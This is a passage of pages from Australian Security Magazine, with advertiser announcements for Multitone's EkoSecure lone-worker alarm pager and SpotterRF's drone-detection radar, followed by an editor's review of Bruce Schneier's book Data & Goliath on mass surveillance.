Red Button Alarm – A single or double press of the button will call for immediate assistance. Man Down Alarm – If the user falls the alarm is raised after a short period. Snatch Alarm – Should the alarm be forcibly taken from the user. Deadman Alarm – The user is polled at predefined intervals and prompted to respond.
Interaction with EkoTek As well as operating as a stand-alone solution, EkoSecure is also able to operate with Multitone’s EkoTek indoor staff protection system, for even greater flexibility and location accuracy. The new EkoSecure pager can be used to roam within the EkoTek mesh network and uses the repeaters for alarms and location in the just the same way. Husam added, “EkoSecure is the perfect
48 | Australian Security Magazine
extension of the EkoTek system, allowing a user to roam an entire site or campus buildings, safe in the knowledge they are protected wherever they are. This is particularly useful around a large site such as a hospital, prison or university, with a broad mixture of different buildings and large outdoor spaces, where it would be very easy to go unnoticed if there were a problem.” Alarm Escalation Once an alarm has been triggered, the alert can be escalated to a rescue team via a choice of communications platforms, including mobile devices, DECT/Wi-Fi enabled phones or by email/IM. This can also be automatically routed to different devices at different times to ensure the right person or team is alerted immediately. EkoSecure also logs all events for audit purposes. Husam concluded, “EkoSecure is a potentially life-saving solution which is perfect for lone worker protection, offering wide area coverage and reliability at a highly scalable and affordable price. It requires minimal training for use and can be installed rapidly, with additional capacity being simple to add, especially for
customers that already use EkoTek for indoors emergency alerts.” To find out more about EkoSecure please visit the Multitone website: www.multitone.com or telephone 01506 418198 About Multitone As a pioneer of wireless messaging, Multitone Electronics plc is a specialist developer of integrated communication systems for on-site and global use. The organisation; which is best known for its supply of critical communications, continues to explore and develop reliable communications and controls, whilst offering robust, targeted systems that effectively and reliably integrate with customers’ existing systems and technologies. The product offering combines the best in wireless telephony, radio-paging systems and personal security systems with professional services and tailored software to create a truly cohesive communication platform. Multitone is part of Kantone Holdings, with a turnover in 2015 in excess of £224 million.
Information presented in TechTime is provided by the relevant advertiser and are not necessarily the views of My Security Media
TechTime - latest news and products
SpotterRF Awards pile up for drone detecting A2000 radar SpotterRF caps off the year with worldwide praise for its new industry leading A2000. This winning technology is the first CSR to provide cost-effective wide area deterrence against the growing threat of low flying UAV (drones) proliferating worldwide. SpotterRF also leads industry efforts to improve FAA rule changes allowing electrical utilities and other critical infrastructure to rapidly respond to incoming drones intent on destruction of people and property. “The FAA estimates the number of commercial drones will explode from less than 20,000 to 600,000 in the coming year,” states Logan Harris, CEO for SpotterRF. “This increases risk of drone misuse against our critical infrastructure. We are pleased to provide immediate relief to power substations and others that have become targets due to the ability of low-cost drones that can carry dangerous payloads.” The Spotter A2000 has garnered the 2016 Platinum Homeland Security Award, Best Drone Detection Perimeter Protection from American Security Today; been named 2016 ASIS International Accolades Winner; and most recently won Best Alarm & Detection Product 2016 from Detektor International—the only U.S. company so recognized by this Europeanbased program. SpotterRF competed and was named winner among such industry goliaths like Axis, FLIR, Bosche, and Milestone Systems. As a leader in drone detection technology, SpotterRF has shared its expertise on the topic during a recent Security Industry Association (SIA) webinar and in a SIA Technology Insights article. “We are pleased to work with SpotterRF to increase awareness of the unique dangers that can be created by drones,” SIA Director of Industry Relations Ron Hawkins said. “Their understanding of the nature of the threat and the countermeasures that are required can help security professionals to manage this new risk and keep people and property safe.” SpotterRF is rapidly becoming the de facto standard for affordable wide area perimeter protection across the globe. Five of the top ten U.S. utility companies now us SpotterRF radar as a key component in protecting the nation’s electrical grid. SpotterRF delivers its award-winning compact surveillance radar (CSR) systems through more than 60 strategic integrators to a global marketplace in 24 countries on six
Information presented in TechTime is provided by the relevant advertiser and are not necessarily the views of My Security Media
continents. SpotterRF will be displayed along with IndustrialENET at the upcoming show, Distributech, held in San Diego on January 31February 2 at booth 4003. About SpotterRF SpotterRF provides protection beyond fences with the world’s most advanced Compact
Surveillance Radar (CSR) system for perimeter security and force protection. Made in the USA and engineered for extreme conditions, SpotterRF technology is the most compact, lightweight, energy efficient, and costeffective radar for elite warfighters and critical infrastructure requirements, such as electrical utilities. For a more information visit https:// spotterrf.com/commercial-products/ .
Australian Security Magazine | 49
EDITOR'S REPORT REVIEW
Data & Goliath by Bruce Schneier
s Bruce Schneier acknowledges, he doesn’t write a book from beginning to end but rather from bottom to top – working on the entire book at once. Bruce’s latest book, Data & Goliath, is about the biggest question of our time – how do we design systems that make use of our data collectively to benefit society as a whole, while at the same time protecting people individually? Schneier gives great credos to Edward Snowden and his ‘legacy’ of being the beginning of a worldwide movement that recognises privacy as a fundamental human right, which is applied in a
50 | Australian Security Magazine
“meaningful and enforceable way’. Yet despite a perceived ‘worldwide movement for privacy’, Bruce takes the reader through the ominous extent of mass digital surveillance, by both government and corporations. Digital and electronic surveillance has developed to become capable of a rapidly progressive erosion of personal privacy, to the near fulfilment of ubiquitous surveillance, as effective in practice known as the ‘panopticon’, conceptualised by Philosopher Jeremy Bentham in the 1700’s – being a prison where every inmate can be surveilled at any time, unawares, and on this assumption the inmate has no choice but to conform. With our personal and daily data behaviours being stored, potentially forever, Schneier notes that an informationage surveillance state would go beyond even Bentham’s “wildest dreams”. The first two chapters should be enough to raise the eyebrows of even the average ‘aware’ reader. As a former national law enforcement officer, where relationships and criminal contacts are reviewed across organised crime groups and across state and federal databases, the extent of how metadata can be used to create not only organisational patterns of behaviour but individual patterns, are as effective in detail as a telephone intercept. Schneier highlights a Stanford University experiment that examined the phone metadata of 500 volunteers for several months – the deduction made from just metadata included being able to identify an automatic weapons owner, home marijuana grower and personal health matters including someone having an abortion, suffering a heart attack and someone diagnosed with multiple sclerosis. Schneier cites former NSA general counsel Stewart Baker, “metadata absolutely tells you everything about somebody’s life. If you have enough metadata you don’t really need content.” Worse still, the former NSA and CIA Director Michael Hayden is quoted, in 2014, “We kill people based on Metadata.” Yet despite this capability, public security is not necessarily enhanced with mass capture of metadata, as being attempted with Australia’s data retention laws. Schneier asserts… “there is no scientific rationale for believing that adding irrelevant data about innocent people makes it easier to find a terrorist attack, and lots of evidence that it does not. You might be adding slightly more signal but you’re also adding much more noise. And despite the NSA’s ‘collect it all’ mentality, its own documents bear this out. The military intelligence community even talks about this problem of “drinking from the fire hose”: having so much irrelevant data that it’s impossible to find the important bits.”
Yet the public is told that more mass surveillance is required to make us safer? The 9/11 Commission Report described a failure to ‘connect the dots’, which Schneier highlights… “the proponents of mass surveillance claim requires collection of more data. But what the report actually said was that the intelligence community had all the information about the plot without mass surveillance, and that the failures were the result of inadequate analysis….Whenever we learn about an NSA success, it invariably comes from targeted surveillance rather than from mass surveillance.” I would argue even this relates to Australian examples also. Schneier asks the right questions and presents a comprehensive and factual account of international data and digital surveillance activities which puts the ‘freedom’ of any western public at risk to future ‘unknown’ government policies. Schneier says, “The harms from mass surveillance are many, and the costs to individuals and society as a whole disproportionately outweigh the benefits. We can and must do something to rein it in.” I will leave it to you, the reader, to get this New York Times best seller and make your own mind up. Having heard Schneier speak publicly a number of times and during my interview with him in Sydney last October, I’m convinced he has written a book every high school student should read and why I’m concerned that Australia’s Federal Attorney General, George Brandis introduced mass data surveillance laws and then famously was unable to even define what metadata was when being interviewed on national television. When law makers take away individual freedoms in a misguided belief they are doing good for the whole, then it’s indicative of the time when the system as a whole is fundamentally and irrevocably broken – and at our peril when faced with an unknown future. Bruce Schneier, aged 53 years, is an American cryptographer, computer security, privacy specialist, and author. Having written several books on general security topics, computer security and cryptography his latest book, ‘Data & Goliath’ is not only a best seller but a MUST read! Get your copy at https://www.schneier.com/ books/data_and_goliath/
Have you recently published a security related book? Or have you just read a new, great security book? Please email us at email@example.com
N I G N I H C N U LA
7 1 0 2